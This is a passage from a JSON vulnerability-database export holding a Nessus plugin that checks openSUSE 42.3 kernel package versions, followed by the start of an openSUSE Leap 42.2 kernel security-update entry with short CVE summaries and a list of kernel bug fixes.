(bsc#1043598).'\n\n - Revert 'xfs: detect and trim torn writes during log\n recovery (bsc#1036215).' \n\n - Revert 'xfs: refactor and open code log record crc check\n (bsc#1036215).'\n\n - Revert 'xfs: refactor log record start detection into a\n new helper (bsc#1036215).'\n\n - Revert 'xfs: return start block of first bad log record\n during recovery (bsc#1036215).'\n\n - Revert 'xfs: support a crc verification only log record\n pass (bsc#1036215).'\n\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure\n (bsc#1059465).\n\n - scsi: megaraid_sas: Check valid aen class range to avoid\n kernel panic (bnc#1012382).\n\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead\n (bnc#1012382).\n\n - scsi: sg: factor out sg_fill_request_table()\n (bnc#1012382).\n\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE\n (bnc#1012382).\n\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n\n - scsi: sg: use standard lists for sg_requests\n (bnc#1012382).\n\n - scsi: storvsc: fix memory leak on ring buffer busy\n (bnc#1012382).\n\n - scsi_transport_fc: Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp\n ingress path (bnc#1012382).\n\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN\n response trace records (bnc#1012382).\n\n - scsi: zfcp: fix missing trace records for early returns\n in TMF eh handlers (bnc#1012382).\n\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to\n correlate with HBA (bnc#1012382).\n\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI\n trace records (bnc#1012382).\n\n - scsi: zfcp: fix queuecommand for scsi_eh commands when\n DIX enabled (bnc#1012382).\n\n - scsi: zfcp: trace HBA FSF response by default on dismiss\n or timedout late response (bnc#1012382).\n\n - scsi: zfcp: trace high part of 'new' 64 bit SCSI LUN\n (bnc#1012382).\n\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n\n - skd: Avoid that module unloading triggers a\n use-after-free (bnc#1012382).\n\n - skd: Submit requests to firmware before triggering the\n doorbell (bnc#1012382).\n\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags\n (bnc#1012382).\n\n - smb: Validate negotiate (to protect against downgrade)\n even if signing off (bnc#1012382).\n\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback\n (bnc#1012382).\n\n - timer/sysclt: Restrict timer migration sysctl values to\n 0 and 1 (bnc#1012382).\n\n - tracing: Apply trace_clock changes to instance max\n buffer (bnc#1012382).\n\n - tracing: Erase irqsoff trace with empty write\n (bnc#1012382).\n\n - tracing: Fix trace_pipe behavior for instance traces\n (bnc#1012382).\n\n - tty: fix __tty_insert_flip_char regression\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() fast path\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() slow path\n (bnc#1012382).\n\n - Update\n patches.drivers/0029-perf-xgene-Remove-bogus-IS_ERR-chec\n k.patch (bsc#1036737).\n\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA\n offsets (bnc#1012382).\n\n - video: fbdev: aty: do not leak uninitialized padding in\n clk to userspace (bnc#1012382).\n\n - Workaround for kABI compatibility with DP-MST patches\n (bsc#1055493).\n\n - x86/cpu/amd: Hide unused legacy_fixup_core_id() function\n (bsc#1060229).\n\n - x86/cpu/amd: Limit cpu_core_id fixup to families older\n than F17h (bsc#1060229).\n\n - x86/fpu: Do not let userspace set bogus xcomp_bv\n (bnc#1012382).\n\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in\n core dumps (bnc#1012382).\n\n - x86/ldt: Fix off by one in get_segment_base()\n (bsc#1061872).\n\n - x86/mm: Fix boot crash caused by incorrect loop count\n calculation in sync_global_pgds() (bsc#1058512).\n\n - x86/mm: Fix fault error path using unsafe vma pointer\n (fate#321300).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005780\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1036215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1036737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1037579\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1037890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1043598\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044503\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1047238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1051987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1052593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1053043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055493\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1056686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1057383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1057498\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058550\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061872\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debugsource-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debugsource-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-devel-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-devel-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-html-4.4.90-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-pdf-4.4.90-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-macros-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-debugsource-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-qa-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-vanilla-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-syms-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debugsource-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-devel-4.4.90-28.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-devel / kernel-macros / kernel-source / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-09-14T16:35:37", "description": "The openSUSE Leap 42.2 Kernel was updated to 4.4.90 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\nThe following non-security bugs were fixed :\n\n - arc: Re-enable MMU upon Machine Check exception\n (bnc#1012382).\n\n - arm64: fault: Route pte translation faults via\n do_translation_fault (bnc#1012382).\n\n - arm64: Make sure SPsel is always set (bnc#1012382).\n\n - arm: pxa: add the number of DMA requestor lines\n (bnc#1012382).\n\n - arm: pxa: fix the number of DMA requestor lines\n (bnc#1012382).\n\n - bcache: correct cache_dirty_target in\n __update_writeback_rate() (bnc#1012382).\n\n - bcache: Correct return value for sysfs attach errors\n (bnc#1012382).\n\n - bcache: do not subtract sectors_to_gc for bypassed IO\n (bnc#1012382).\n\n - bcache: fix bch_hprint crash and improve output\n (bnc#1012382).\n\n - bcache: fix for gc and write-back race (bnc#1012382).\n\n - bcache: Fix leak of bdev reference (bnc#1012382).\n\n - bcache: initialize dirty stripes in flash_dev_run()\n (bnc#1012382).\n\n - blacklist.conf: Add commit b5accbb0dfae\n\n - blacklist.conf: add one more\n\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n\n - bsg-lib: do not free job in bsg_prepare_job\n (bnc#1012382).\n\n - btrfs: change how we decide to commit transactions\n during flushing (bsc#1060197).\n\n - btrfs: fix NULL pointer dereference from\n free_reloc_roots() (bnc#1012382).\n\n - btrfs: prevent to set invalid default subvolid\n (bnc#1012382).\n\n - btrfs: propagate error to btrfs_cmp_data_prepare caller\n (bnc#1012382).\n\n - btrfs: qgroup: move noisy underflow warning to debugging\n build (bsc#1055755).\n\n - cifs: Fix SMB3.1.1 guest authentication to Samba\n (bnc#1012382).\n\n - cifs: release auth_key.response for reconnect\n (bnc#1012382).\n\n - crypto: AF_ALG - remove SGL terminator indicator when\n chaining (bnc#1012382).\n\n - crypto: talitos - Do not provide setkey for non hmac\n hashing algs (bnc#1012382).\n\n - crypto: talitos - fix sha224 (bnc#1012382).\n\n - cxl: Fix driver use count (bnc#1012382).\n\n - dmaengine: mmp-pdma: add number of requestors\n (bnc#1012382).\n\n - drm: Add driver-private objects to atomic state\n (bsc#1055493).\n\n - drm/dp: Introduce MST topology state to track available\n link bandwidth (bsc#1055493).\n\n - ext4: fix incorrect quotaoff if the quota feature is\n enabled (bnc#1012382).\n\n - ext4: fix quota inconsistency during orphan cleanup for\n read-only mounts (bnc#1012382).\n\n - f2fs: check hot_data for roll-forward recovery\n (bnc#1012382).\n\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n\n - ftrace: Fix memleak when unregistering dynamic ops when\n tracing disabled (bnc#1012382).\n\n - ftrace: Fix selftest goto location on error\n (bnc#1012382).\n\n - genirq: Fix for_each_action_of_desc() macro\n (bsc#1061064).\n\n - getcwd: Close race with d_move called by lustre\n (bsc#1052593).\n\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM\n switch (bnc#1022967).\n\n - input: i8042 - add Gigabyte P57 to the keyboard reset\n table (bnc#1012382).\n\n - iommu/vt-d: Avoid calling virt_to_phys() on NULL pointer\n (bsc#1061067).\n\n - ipv6: accept 64k - 1 packet length in\n ip6_find_1stfragopt() (bnc#1012382).\n\n - ipv6: add rcu grace period before freeing fib6_node\n (bnc#1012382).\n\n - ipv6: fix memory leak with multiple tables during netns\n destruction (bnc#1012382).\n\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n\n - kabi/severities: ignore nfs_pgio_data_destroy\n\n - keys: fix writing past end of user-supplied buffer in\n keyring_read() (bnc#1012382).\n\n - keys: prevent creating a different user's keyrings\n (bnc#1012382).\n\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n\n - kvm: async_pf: Fix #DF due to inject 'Page not Present'\n and 'Page Ready' exceptions simultaneously\n (bsc#1061017).\n\n - kvm: PPC: Book3S: Fix race and leak in\n kvm_vm_ioctl_create_spapr_tce() (bnc#1012382).\n\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte()\n (bsc#1061017).\n\n - kvm: VMX: remove WARN_ON_ONCE in\n kvm_vcpu_trigger_posted_interrupt (bsc#1061017).\n\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n\n - mac80211: flush hw_roc_start work before cancelling the\n ROC (bnc#1012382).\n\n - md/bitmap: disable bitmap_resize for file-backed bitmaps\n (bsc#1061172).\n\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in\n break_stripe_batch_list (bnc#1012382).\n\n - md/raid5: release/flush io in raid5_do_work()\n (bnc#1012382).\n\n - media: uvcvideo: Prevent heap overflow when accessing\n mapped controls (bnc#1012382).\n\n - media: v4l2-compat-ioctl32: Fix timespec conversion\n (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both\n infinite inputs (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input\n values with opposite signs (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of\n both inputs zero (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN\n propagation (bnc#1012382).\n\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both\n inputs negative (bnc#1012382).\n\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity\n and zero inputs (bnc#1012382).\n\n - mm: prevent double decrease of nr_reserved_highatomic\n (bnc#1012382).\n\n - nfsd: Fix general protection fault in\n release_lock_stateid() (bnc#1012382).\n\n - pci: Allow PCI express root ports to find themselves\n (bsc#1061046).\n\n - pci: fix oops when try to find Root Port for a PCI\n device (bsc#1061046).\n\n - pci: Fix race condition with driver_override\n (bnc#1012382).\n\n - pci: shpchp: Enable bridge bus mastering if MSI is\n enabled (bnc#1012382).\n\n - perf/x86: Fix RDPMC vs. mm_struct tracking\n (bsc#1061831).\n\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs.\n mm_struct tracking' (bsc#1061831).\n\n - powerpc: Fix DAR reporting when alignment handler faults\n (bnc#1012382).\n\n - powerpc/pseries: Fix parent_dn reference leak in\n add_dt_node() (bnc#1012382).\n\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n\n - Revert 'net: fix percpu memory leaks' (bnc#1012382).\n\n - Revert 'net: phy: Correctly process PHY_HALTED in\n phy_stop_machine()' (bnc#1012382).\n\n - Revert 'net: use lib/percpu_counter API for\n fragmentation mem accounting' (bnc#1012382).\n\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure\n (bsc#1059465).\n\n - scsi: megaraid_sas: Check valid aen class range to avoid\n kernel panic (bnc#1012382).\n\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead\n (bnc#1012382).\n\n - scsi: sg: factor out sg_fill_request_table()\n (bnc#1012382).\n\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE\n (bnc#1012382).\n\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n\n - scsi: sg: use standard lists for sg_requests\n (bnc#1012382).\n\n - scsi: storvsc: fix memory leak on ring buffer busy\n (bnc#1012382).\n\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp\n ingress path (bnc#1012382).\n\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN\n response trace records (bnc#1012382).\n\n - scsi: zfcp: fix missing trace records for early returns\n in TMF eh handlers (bnc#1012382).\n\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to\n correlate with HBA (bnc#1012382).\n\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI\n trace records (bnc#1012382).\n\n - scsi: zfcp: fix queuecommand for scsi_eh commands when\n DIX enabled (bnc#1012382).\n\n - scsi: zfcp: trace HBA FSF response by default on dismiss\n or timedout late response (bnc#1012382).\n\n - scsi: zfcp: trace high part of 'new' 64 bit SCSI LUN\n (bnc#1012382).\n\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n\n - skd: Avoid that module unloading triggers a\n use-after-free (bnc#1012382).\n\n - skd: Submit requests to firmware before triggering the\n doorbell (bnc#1012382).\n\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags\n (bnc#1012382).\n\n - smb: Validate negotiate (to protect against downgrade)\n even if signing off (bnc#1012382).\n\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback\n (bnc#1012382).\n\n - timer/sysclt: Restrict timer migration sysctl values to\n 0 and 1 (bnc#1012382).\n\n - tracing: Apply trace_clock changes to instance max\n buffer (bnc#1012382).\n\n - tracing: Erase irqsoff trace with empty write\n (bnc#1012382).\n\n - tracing: Fix trace_pipe behavior for instance traces\n (bnc#1012382).\n\n - tty: fix __tty_insert_flip_char regression\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() fast path\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() slow path\n (bnc#1012382).\n\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA\n offsets (bnc#1012382).\n\n - video: fbdev: aty: do not leak uninitialized padding in\n clk to userspace (bnc#1012382).\n\n - Workaround for kABI compatibility with DP-MST patches\n (bsc#1055493).\n\n - x86/fpu: Do not let userspace set bogus xcomp_bv\n (bnc#1012382).\n\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in\n core dumps (bnc#1012382).\n\n - x86/ldt: Fix off by one in get_segment_base()\n (bsc#1061872).\n\n - xfs/dmapi: fix incorrect file->f_path.dentry->d_inode\n usage (bsc#1055896).", "edition": 19, "cvss3": {"score": 7.1, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"}, "published": "2017-10-23T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2017-1159)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2017-10-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", 